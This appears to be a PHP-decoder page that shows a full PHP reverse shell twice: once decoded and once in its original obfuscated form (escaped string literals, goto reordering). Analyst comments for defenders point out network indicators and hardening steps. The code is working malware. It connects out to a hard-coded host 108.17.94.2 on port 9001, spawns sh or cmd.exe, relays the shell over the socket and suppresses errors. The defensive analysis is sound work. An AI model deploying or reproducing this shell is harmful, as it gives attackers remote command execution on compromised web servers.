PHP Decode
<?php goto A9Zsn; XgH6P: $sh = new Shell("\x31\x30\x38\56\x31\67\56\71\64\x2e\x32", 900..
Decoded Output download
<?php
// The goto/label pairs only scramble the textual order of the statements. Control jumps to
// label A9Zsn (placed directly before the class declaration) and the `goto XgH6P` that follows
// the class body brings it back to the instantiation below.
goto A9Zsn;
XgH6P:
// Hard-coded callback endpoint: remote address 108.17.94.2, TCP port 9001. Both values are
// network indicators for this sample (egress firewall, proxy and flow logs).
$sh = new Shell("108.17.94.2", 9001);
goto GyPJ5;
A9Zsn:
/**
 * Reverse shell: connects out to a remote host and attaches a local command interpreter to
 * that connection.
 *
 * run() opens a TCP client socket with fsockopen() to $addr:$port, starts "sh" (Linux) or
 * "cmd.exe" (Windows) through proc_open() with stdin/stdout/stderr pipes, and copies bytes
 * between the socket and the pipes until one side closes or an I/O error is recorded.
 *
 * Review notes for defenders:
 *  - Host side: a PHP / web-server worker that owns a child "sh" or "cmd.exe" together with an
 *    outbound TCP connection. The worker lifts its execution time limit (set_time_limit(0)) and
 *    polls with a zero stream_select() timeout, so sustained CPU use by that worker is likely.
 *  - Network side: the first bytes sent after connect are the clear-text banner
 *    "SOCKET: Shell has connected! PID: <n>" followed by a newline.
 *  - Hardening: where the application does not need them, proc_open and fsockopen can be listed
 *    in the php.ini disable_functions directive, and outbound connections from web servers can
 *    be restricted to known destinations.
 */
class Shell
{
// Remote host and port for the outbound connection; both are set by the constructor.
private $addr = null;
private $port = null;
// Set by detect(): "LINUX" or "WINDOWS", and the interpreter to spawn ("sh" or "cmd.exe").
private $os = null;
private $shell = null;
// proc_open() descriptor spec: 0 = child stdin (pipe the child reads), 1 = child stdout and
// 2 = child stderr (pipes the child writes).
private $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
// Maximum number of bytes requested per fread() call.
private $buffer = 1024;
// Windows only: running count of bytes written to the child's stdin; brw() later reads and
// discards that many bytes from the child's STDOUT.
private $clen = 0;
// Set to true by read()/write() when fread()/fwrite() returns false; ends the loop in run().
private $error = false;
/**
 * Stores the callback endpoint. No validation is performed on either value.
 *
 * @param mixed $addr Remote host passed to fsockopen() in run().
 * @param mixed $port Remote TCP port passed to fsockopen() in run().
 */
public function __construct($addr, $port)
{
$this->addr = $addr;
$this->port = $port;
}
/**
 * Chooses the interpreter from the PHP_OS constant (case-insensitive substring match).
 *
 * @return bool true when PHP_OS contains "LINUX", "WIN32", "WINNT" or "WINDOWS"; false for any
 *              other platform, in which case run() does nothing.
 */
private function detect()
{
$detected = true;
if (stripos(PHP_OS, "LINUX") !== false) {
$this->os = "LINUX";
$this->shell = "sh";
} else {
if (stripos(PHP_OS, "WIN32") !== false || stripos(PHP_OS, "WINNT") !== false || stripos(PHP_OS, "WINDOWS") !== false) {
$this->os = "WINDOWS";
$this->shell = "cmd.exe";
} else {
$detected = false;
}
}
return $detected;
}
/**
 * Despite the name, performs no process forking in the code as shown.
 *
 * NOTE(review): $pid is never assigned inside this method, so `$pid > 0` compares an undefined
 * variable with 0 and is false; the method therefore always returns false. run() calls this
 * before settings() turns error reporting off, so the resulting undefined-variable diagnostic
 * may still reach the PHP error log, depending on the server's logging configuration.
 *
 * @return bool Always false as written.
 */
private function daemonize()
{
$exit = false;
if ($pid > 0) {
$exit = true;
}
return $exit;
}
/**
 * Adjusts the runtime so the script stays quiet and is not stopped by PHP's time limit.
 * Each call is prefixed with @ so a failure of the call itself is not reported.
 */
private function settings()
{
// Turn off PHP error reporting for the rest of the request.
@error_reporting(0);
// Remove the maximum execution time; the relay loop in run() can then run indefinitely.
@set_time_limit(0);
// Clear the file-creation mask of the process.
@umask(0);
}
/**
 * Has no observable effect: the replaced text is assigned to the local $data and is neither
 * returned nor printed.
 *
 * As rendered in this decoded listing each str_replace() call swaps a character for itself; in
 * the escaped original on the same page the replacement strings decode to the HTML entities
 * "&lt;" and "&gt;".
 *
 * @param string $data Bytes that were just relayed.
 */
private function dump($data)
{
$data = str_replace("<", "<", $data);
$data = str_replace(">", ">", $data);
}
/**
 * Reads up to $buffer bytes from $stream with warnings suppressed.
 *
 * @param resource $stream Stream to read from.
 * @param string   $name   Label of the stream; not used in the body.
 * @param int      $buffer Maximum number of bytes to read.
 * @return string|false The data read, or false on failure (in which case $this->error is set).
 */
private function read($stream, $name, $buffer)
{
if (($data = @fread($stream, $buffer)) === false) {
$this->error = true;
}
return $data;
}
/**
 * Writes $data to $stream with warnings suppressed.
 *
 * @param resource $stream Stream to write to.
 * @param string   $name   Label of the stream; not used in the body.
 * @param string   $data   Bytes to write.
 * @return int|false Number of bytes written, or false on failure (in which case $this->error is set).
 */
private function write($stream, $name, $data)
{
if (($bytes = @fwrite($stream, $data)) === false) {
$this->error = true;
}
return $bytes;
}
/**
 * Copies data from $input to $output in chunks of at most $this->buffer bytes.
 *
 * The loop stops as soon as read() returns a falsy value (false or an empty string) or write()
 * returns a falsy value (false or 0 bytes).
 *
 * @param resource $input  Source stream.
 * @param resource $output Destination stream.
 * @param string   $iname  Label of the source ("SOCKET", "STDOUT", "STDERR").
 * @param string   $oname  Label of the destination ("STDIN", "SOCKET").
 */
private function rw($input, $output, $iname, $oname)
{
while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
// On Windows, remember how many bytes were sent to the child's stdin; brw() uses the total
// to skip the same number of bytes from the child's STDOUT.
if ($this->os === "WINDOWS" && $oname === "STDIN") {
$this->clen += strlen($data);
}
$this->dump($data);
}
}
/**
 * Size-bounded copy used for the Windows pipes: forwards exactly the number of bytes that
 * fstat() reports as pending on $input.
 *
 * @param resource $input  Source stream (a child pipe in the calls made by run()).
 * @param resource $output Destination stream.
 * @param string   $iname  Label of the source ("STDOUT" or "STDERR").
 * @param string   $oname  Label of the destination.
 */
private function brw($input, $output, $iname, $oname)
{
$fstat = fstat($input);
$size = $fstat["size"];
// For STDOUT on Windows, first read and throw away $this->clen bytes.
// NOTE(review): presumably this drops the console echo of the input just written to stdin - confirm.
if ($this->os === "WINDOWS" && $iname === "STDOUT" && $this->clen) {
while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
$this->clen -= $bytes;
$size -= $bytes;
}
}
// Forward whatever remains of the reported size, at most $this->buffer bytes per iteration.
while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
$size -= $bytes;
$this->dump($data);
}
}
/**
 * Connects to the remote endpoint, spawns the interpreter and relays traffic between them.
 *
 * Does nothing when detect() fails. The relay loop ends when the socket or the child's stdout
 * reaches EOF, the child stops running, stream_select() fails, or read()/write() set
 * $this->error. Pipes, process handle and socket are closed afterwards.
 */
public function run()
{
if ($this->detect() && !$this->daemonize()) {
$this->settings();
// Outbound TCP connection with a 30 second connect timeout; warnings suppressed with @.
$socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
if ($socket) {
stream_set_blocking($socket, false);
// Spawn "sh" or "cmd.exe" as a child of the PHP process, inheriting its cwd and environment.
$process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
if ($process) {
foreach ($pipes as $pipe) {
stream_set_blocking($pipe, false);
}
$status = proc_get_status($process);
// Clear-text banner carrying the child's PID; a stable string for network signatures.
@fwrite($socket, "SOCKET: Shell has connected! PID: " . $status["pid"] . "
");
do {
$status = proc_get_status($process);
if (feof($socket)) {
break;
} else {
if (feof($pipes[1]) || !$status["running"]) {
break;
}
}
$streams = array("read" => array($socket, $pipes[1], $pipes[2]), "write" => null, "except" => null);
// Timeout 0: stream_select() returns immediately, so this do/while polls without sleeping.
$num_changed_streams = @stream_select($streams["read"], $streams["write"], $streams["except"], 0);
if ($num_changed_streams === false) {
break;
} else {
if ($num_changed_streams > 0) {
if ($this->os === "LINUX") {
// Linux: relay whichever of socket, stderr and stdout stream_select() reported as readable.
if (in_array($socket, $streams["read"])) {
$this->rw($socket, $pipes[0], "SOCKET", "STDIN");
}
if (in_array($pipes[2], $streams["read"])) {
$this->rw($pipes[2], $socket, "STDERR", "SOCKET");
}
if (in_array($pipes[1], $streams["read"])) {
$this->rw($pipes[1], $socket, "STDOUT", "SOCKET");
}
} else {
if ($this->os === "WINDOWS") {
// Windows: the socket still relies on stream_select(), but the child pipes are checked
// through fstat()["size"] instead.
// NOTE(review): presumably because stream_select() is not reliable for proc_open pipes on
// Windows - confirm.
if (in_array($socket, $streams["read"])) {
$this->rw($socket, $pipes[0], "SOCKET", "STDIN");
}
if (($fstat = fstat($pipes[2])) && $fstat["size"]) {
$this->brw($pipes[2], $socket, "STDERR", "SOCKET");
}
if (($fstat = fstat($pipes[1])) && $fstat["size"]) {
$this->brw($pipes[1], $socket, "STDOUT", "SOCKET");
}
}
}
}
}
} while (!$this->error);
foreach ($pipes as $pipe) {
fclose($pipe);
}
proc_close($process);
}
fclose($socket);
}
}
}
}
// Jump back to the instantiation that precedes the class declaration in the file.
goto XgH6P;
GyPJ5:
// Entry point: run() makes the outbound connection and returns only after its relay loop ends.
$sh->run();
goto ysT75;
ysT75:
unset($sh);
goto Mc7qU;
Mc7qU: ?>
Original Code
<?php
// Obfuscation in this sample is limited to two things: goto/label reordering of the top-level
// statements, and string literals written as mixed octal (\NNN) and hex (\xNN) escapes inside
// double-quoted strings, which PHP resolves when it parses the file.
goto A9Zsn;
XgH6P:
// The escaped literal decodes to "108.17.94.2"; together with port 9001 it is the hard-coded
// callback endpoint of the sample.
$sh = new Shell("\x31\x30\x38\56\x31\67\56\71\64\x2e\x32", 9001);
goto GyPJ5;
A9Zsn:
/**
 * Obfuscated form of the reverse shell: an outbound fsockopen() connection is wired to a
 * command interpreter started with proc_open().
 *
 * Only string literals are escaped. Function names (fsockopen, proc_open, stream_select,
 * proc_get_status), the class name and the property names are in clear text, so static
 * matching on those identifiers still applies to this form. No eval() or encoded payload layer
 * is involved; the escapes decode to the plain strings noted in the comments below.
 */
class Shell
{
private $addr = null;
private $port = null;
private $os = null;
private $shell = null;
// Decodes to array("pipe", "r"), array("pipe", "w"), array("pipe", "w"): stdin, stdout, stderr.
private $descriptorspec = array(0 => array("\x70\151\x70\x65", "\162"), 1 => array("\160\151\160\145", "\167"), 2 => array("\x70\151\x70\x65", "\x77"));
private $buffer = 1024;
private $clen = 0;
private $error = false;
/**
 * Stores the remote host and port used by run().
 */
public function __construct($addr, $port)
{
$this->addr = $addr;
$this->port = $port;
}
/**
 * Matches PHP_OS against "LINUX", "WIN32", "WINNT" and "WINDOWS" (the decoded literals) and
 * selects "sh" or "cmd.exe"; returns false for any other platform.
 */
private function detect()
{
$detected = true;
// "LINUX" -> os "LINUX", shell "sh"
if (stripos(PHP_OS, "\x4c\x49\x4e\125\130") !== false) {
$this->os = "\x4c\111\x4e\125\x58";
$this->shell = "\163\x68";
} else {
// "WIN32" / "WINNT" / "WINDOWS" -> os "WINDOWS", shell "cmd.exe"
if (stripos(PHP_OS, "\127\111\116\63\62") !== false || stripos(PHP_OS, "\127\111\116\x4e\x54") !== false || stripos(PHP_OS, "\127\111\x4e\x44\117\x57\123") !== false) {
$this->os = "\x57\x49\116\x44\x4f\127\123";
$this->shell = "\143\155\x64\56\x65\x78\x65";
} else {
$detected = false;
}
}
return $detected;
}
/**
 * NOTE(review): $pid is never assigned in this method, so the comparison is false and the
 * method always returns false; no forking takes place in the code as shown.
 */
private function daemonize()
{
$exit = false;
if ($pid > 0) {
$exit = true;
}
return $exit;
}
/**
 * Disables error reporting, removes the execution time limit and clears the umask; every call
 * is prefixed with @ to suppress its own warnings.
 */
private function settings()
{
@error_reporting(0);
@set_time_limit(0);
@umask(0);
}
/**
 * Replaces "<" with "&lt;" and ">" with "&gt;" (decoded literals) in a local copy of $data;
 * the result is neither returned nor printed, so the method has no observable effect.
 */
private function dump($data)
{
$data = str_replace("\x3c", "\46\154\164\x3b", $data);
$data = str_replace("\x3e", "\x26\x67\164\73", $data);
}
/**
 * fread() wrapper with warnings suppressed; sets $this->error when fread() returns false.
 * $name is not used.
 */
private function read($stream, $name, $buffer)
{
if (($data = @fread($stream, $buffer)) === false) {
$this->error = true;
}
return $data;
}
/**
 * fwrite() wrapper with warnings suppressed; sets $this->error when fwrite() returns false.
 * $name is not used.
 */
private function write($stream, $name, $data)
{
if (($bytes = @fwrite($stream, $data)) === false) {
$this->error = true;
}
return $bytes;
}
/**
 * Copies from $input to $output until read() or write() returns a falsy value.
 */
private function rw($input, $output, $iname, $oname)
{
while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
// Literals decode to "WINDOWS" and "STDIN": count the bytes sent to the child's stdin.
if ($this->os === "\x57\111\116\104\x4f\127\123" && $oname === "\123\x54\x44\x49\116") {
$this->clen += strlen($data);
}
$this->dump($data);
}
}
/**
 * Copies exactly the number of bytes that fstat() reports for $input; on Windows STDOUT it
 * first reads and discards $this->clen bytes.
 */
private function brw($input, $output, $iname, $oname)
{
$fstat = fstat($input);
// Key decodes to "size".
$size = $fstat["\163\x69\x7a\145"];
// Literals decode to "WINDOWS" and "STDOUT".
if ($this->os === "\x57\x49\x4e\104\x4f\127\x53" && $iname === "\x53\124\x44\x4f\x55\124" && $this->clen) {
while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
$this->clen -= $bytes;
$size -= $bytes;
}
}
while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
$size -= $bytes;
$this->dump($data);
}
}
/**
 * Connects out with fsockopen(), starts the interpreter with proc_open() and relays data
 * between the socket and the child's pipes until EOF, process exit, a stream_select() failure
 * or a recorded I/O error; then closes the pipes, the process handle and the socket.
 */
public function run()
{
if ($this->detect() && !$this->daemonize()) {
$this->settings();
$socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
if ($socket) {
stream_set_blocking($socket, false);
$process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
if ($process) {
foreach ($pipes as $pipe) {
stream_set_blocking($pipe, false);
}
$status = proc_get_status($process);
// Decodes to the banner "SOCKET: Shell has connected! PID: ", the "pid" key and a newline.
@fwrite($socket, "\x53\117\103\x4b\105\124\x3a\x20\x53\150\x65\154\154\40\150\141\x73\40\143\x6f\156\156\x65\143\x74\145\144\x21\x20\120\x49\104\72\x20" . $status["\x70\x69\144"] . "\12");
do {
$status = proc_get_status($process);
if (feof($socket)) {
break;
} else {
// Key decodes to "running".
if (feof($pipes[1]) || !$status["\x72\165\x6e\x6e\151\156\147"]) {
break;
}
}
// Keys decode to "read", "write" and "except".
$streams = array("\162\x65\141\x64" => array($socket, $pipes[1], $pipes[2]), "\x77\162\x69\164\x65" => null, "\x65\x78\x63\145\160\x74" => null);
// Timeout 0: stream_select() returns immediately, so the loop polls without sleeping.
$num_changed_streams = @stream_select($streams["\x72\x65\x61\x64"], $streams["\167\162\x69\164\145"], $streams["\x65\x78\143\145\x70\x74"], 0);
if ($num_changed_streams === false) {
break;
} else {
if ($num_changed_streams > 0) {
// "LINUX" branch: stream labels decode to "SOCKET", "STDIN", "STDERR" and "STDOUT".
if ($this->os === "\x4c\x49\116\x55\x58") {
if (in_array($socket, $streams["\x72\145\x61\x64"])) {
$this->rw($socket, $pipes[0], "\x53\x4f\103\113\105\124", "\x53\x54\104\111\x4e");
}
if (in_array($pipes[2], $streams["\162\145\141\144"])) {
$this->rw($pipes[2], $socket, "\123\x54\104\105\x52\x52", "\x53\x4f\x43\113\x45\124");
}
if (in_array($pipes[1], $streams["\x72\145\x61\x64"])) {
$this->rw($pipes[1], $socket, "\x53\124\x44\x4f\x55\x54", "\123\117\103\x4b\105\x54");
}
} else {
// "WINDOWS" branch: child pipes are checked through fstat()["size"] and copied with brw().
if ($this->os === "\127\x49\116\x44\x4f\x57\123") {
if (in_array($socket, $streams["\x72\x65\141\144"])) {
$this->rw($socket, $pipes[0], "\x53\x4f\x43\x4b\x45\x54", "\123\124\x44\x49\x4e");
}
if (($fstat = fstat($pipes[2])) && $fstat["\x73\x69\x7a\145"]) {
$this->brw($pipes[2], $socket, "\x53\x54\x44\105\122\122", "\x53\117\103\x4b\105\124");
}
if (($fstat = fstat($pipes[1])) && $fstat["\x73\x69\x7a\x65"]) {
$this->brw($pipes[1], $socket, "\123\x54\104\x4f\x55\x54", "\x53\117\x43\113\105\x54");
}
}
}
}
}
} while (!$this->error);
foreach ($pipes as $pipe) {
fclose($pipe);
}
proc_close($process);
}
fclose($socket);
}
}
}
}
// Jump back to the instantiation that precedes the class declaration in the file.
goto XgH6P;
GyPJ5:
// Entry point: run() makes the outbound connection and returns only after its relay loop ends.
$sh->run();
goto ysT75;
ysT75:
unset($sh);
goto Mc7qU;
Mc7qU: ?>
Function Calls
None |
Stats
MD5 | b3edc4e90e35b711030e0acfc9269449 |
Eval Count | 0 |
Decode Time | 53 ms |